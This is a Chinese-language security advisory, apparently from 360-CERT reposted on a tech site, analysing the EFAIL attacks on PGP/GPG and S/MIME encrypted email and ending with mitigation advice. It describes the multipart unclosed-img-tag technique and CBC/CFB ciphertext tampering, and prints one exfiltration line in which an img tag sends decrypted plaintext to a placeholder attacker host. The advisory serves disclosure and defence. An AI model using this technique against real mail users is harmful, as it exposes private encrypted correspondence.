溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

如何進(jìn)行EFAIL中的PGP/GPG和S/MIME漏洞分析

發(fā)布時(shí)間:2021-12-28 14:50:58 來(lái)源:億速云 閱讀:177 作者:柒染 欄目:大數(shù)據(jù)

如何進(jìn)行EFAIL中的PGP/GPG和S/MIME漏洞分析,針對(duì)這個(gè)問(wèn)題,這篇文章詳細(xì)介紹了相對(duì)應(yīng)的分析和解答,希望可以幫助更多想解決這個(gè)問(wèn)題的小伙伴找到更簡(jiǎn)單易行的方法。

0x00 漏洞背景

PGP/GPG 和 S/MIME是為電子郵件提供端到端安全的兩個(gè)重要標(biāo)準(zhǔn)。

14日,歐洲安全研究員Sebastian Schinzel在twitter對(duì) PGP/GPG 和 S/MIME 進(jìn)行了漏洞預(yù)警,隨后細(xì)節(jié)被公開。

360-CERT對(duì)漏洞持續(xù)關(guān)注,并對(duì)漏洞進(jìn)行了詳細(xì)分析。

0x01 漏洞詳情

電子郵件客戶端對(duì)郵件內(nèi)容展示有多種方式,其中HTML渲染是最流行的一種。HTML支持網(wǎng)絡(luò)資源的請(qǐng)求,例如<img/> 、<input/>、<script><scirpt />等。

本次EFAIL攻擊就是借助的<img />標(biāo)簽的src屬性,將解密后的原文發(fā)送到攻擊者控制的遠(yuǎn)程服務(wù)器上,從而造成信息泄露。

漏洞根本的原因,是因?yàn)殡娮余]件客戶端在處理multipart郵件的時(shí)候,對(duì)每一個(gè)multipart獨(dú)立處理,而在顯示的時(shí)候,會(huì)將多multipart郵件的渲染到同一個(gè)HTML里面。這樣在郵件顯示的時(shí)候,明文和解密后的原文將在一起顯示,在這里會(huì)有安全隱患。

0x02 滲透攻擊

在電子郵件中允許多段存在,如圖所示:

如何進(jìn)行EFAIL中的PGP/GPG和S/MIME漏洞分析

其中multipart進(jìn)行多part標(biāo)識(shí),protocol進(jìn)行配置,同時(shí)使用boundary進(jìn)行分割。

郵件客戶端處理郵件時(shí),會(huì)對(duì)每個(gè)part獨(dú)立處理,但是最后將渲染到同一個(gè)HTML界面中。這樣我們可以構(gòu)造如下PoC來(lái)利用該特性:

如何進(jìn)行EFAIL中的PGP/GPG和S/MIME漏洞分析

可以看到,PoC中利用boundary將郵件分為了三部分,分別為Content-Type: text/html ,Content-Type: multipart/encrypted;protocol="application/pgp-encrypted"; ,和 Content-Type: text/html 。

  • 第一部分,定義一個(gè)img標(biāo)簽,src中為攻擊者接受郵件明文的遠(yuǎn)程主機(jī)。注意:在這里,src的引號(hào)和img的/>不閉合。

  • 第二部分,為使用端到端加密后的郵件主體。

  • 第三部分,對(duì)第一部分的標(biāo)簽進(jìn)行閉合。

因?yàn)猷]件客戶端對(duì)每個(gè)multipart獨(dú)立處理,在這個(gè)過(guò)程中會(huì)對(duì)加密郵件進(jìn)行解密。當(dāng)受害者打開郵件的時(shí),進(jìn)行解密渲染,最后該郵件將解析為:

<img src="http://x.x.x.x/郵件明文">

這樣的內(nèi)容在受害者電子郵件客戶端顯示的時(shí)候,會(huì)發(fā)起http請(qǐng)求,將加密的郵件原文發(fā)往攻擊者主機(jī)。

0x03 S/MIM缺陷

如果S/MIME采用CBC或者CFB模式,那么將會(huì)受到EFAIL攻擊。

以CBC為例,CBC模式里是分段明文,每段數(shù)據(jù)都是通過(guò)頭部與上一段密文亦或進(jìn)行加密的。如下圖所示:

如何進(jìn)行EFAIL中的PGP/GPG和S/MIME漏洞分析

在(a)這里, 有已知數(shù)據(jù)IV,C0,P0, 整個(gè)揭秘過(guò)程會(huì)自動(dòng)亦或后得到C2,C3的部分,也就是我們想要伸出的目標(biāo)數(shù)據(jù)unknown plaintext。

攻擊邏輯很簡(jiǎn)單,將已知的頭部標(biāo)記(明文段"Content-type")的密文部分篡改為img標(biāo)簽,把加密的密文包裹起來(lái)。這樣在解析顯示的時(shí)候會(huì)達(dá)到和第一種方法相同的攻擊效果。

如何進(jìn)行EFAIL中的PGP/GPG和S/MIME漏洞分析

CFB模式和 CBC 類似,都必須要知道加密內(nèi)容一部分明文,逐步替換插入 img 標(biāo)簽,最終達(dá)到攻擊的目的。

0x04 漏洞演示

漏洞有許多攻擊場(chǎng)景,例如中間人攻擊。

如何進(jìn)行EFAIL中的PGP/GPG和S/MIME漏洞分析

攻擊者作為中間人劫持到郵件流量,在加密的郵件點(diǎn)前后添加multipart。用戶受到郵件打開后,明文內(nèi)容將被img標(biāo)簽發(fā)送給攻擊者。達(dá)到加密郵件泄露的效果:

如何進(jìn)行EFAIL中的PGP/GPG和S/MIME漏洞分析

0x05 漏洞影響面

漏洞影響包括window,linux, 安卓,IOS等在內(nèi)的多平臺(tái)多應(yīng)用,具體影響范圍如下圖所示:

如何進(jìn)行EFAIL中的PGP/GPG和S/MIME漏洞分析

0x05 安全建議

漏洞雖然影響氛圍廣,但是利用難度大。

目前沒(méi)有針對(duì)該漏洞的修復(fù)補(bǔ)丁,所以在漏洞修復(fù)之前,請(qǐng)廣大用戶立即禁用或卸載自動(dòng)解密 PGP加密電子郵件的工具。不要閱讀PGP加密的郵件。

關(guān)于如何進(jìn)行EFAIL中的PGP/GPG和S/MIME漏洞分析問(wèn)題的解答就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,如果你還有很多疑惑沒(méi)有解開,可以關(guān)注億速云行業(yè)資訊頻道了解更多相關(guān)知識(shí)。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI